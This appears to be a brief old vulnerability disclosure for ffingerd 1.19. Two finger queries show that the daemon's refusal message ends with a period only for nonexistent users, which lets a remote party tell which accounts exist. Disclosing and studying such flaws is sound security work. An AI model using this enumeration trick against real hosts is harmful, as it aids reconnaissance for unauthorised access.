Exploit:

  ffingerd 1.19 Bug.

  -----
  (aristo)/cc/eilon>finger root@host.domain
  [host.domain]
  That user does not want to be fingered
  -----

  Hmmm, now for an unknown user.

  -----
  (aristo)/cc/eilon>finger root1@host.domain
  [host.domain]
  That user does not want to be fingered.
  -----

  Oops. Notice the  dot  ('.') at the  end  of the
  sentence.  A very simple  and  efficient way  to
  find whether the user exists on the remote host.

             Eilon Gishri